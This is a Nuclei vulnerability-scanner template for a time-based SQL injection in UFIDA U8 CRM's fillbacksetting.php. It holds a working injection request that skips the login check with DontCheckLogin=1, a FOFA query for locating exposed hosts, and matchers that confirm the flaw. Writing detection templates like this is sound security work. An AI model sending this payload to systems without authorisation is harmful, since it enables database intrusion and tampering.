nuclei-templates/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml

32 lines
1.3 KiB
YAML

id: yonyou-u8-crm-tb-sqli
info:
name: UFIDA U8 CRM fillbacksetting.php - SQL Injection
author: s4e-io
severity: high
description: |
UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: title="用友U8CRM"
tags: yonyou,u8-crm,sqli
http:
- raw:
- |
@timeout 20s
GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=bgsesstimeout-;
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(body, "{\"success\":true}")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220535732178e824c68b912ae20a8e274cd947c0dfba5285f679b0fbdcd9d39a59a02204887bdb85630f5121f9e721cea27a49e41df2d5e920f55be3295748b656aa8e7:922c64590222798bb761d5b6d8e72950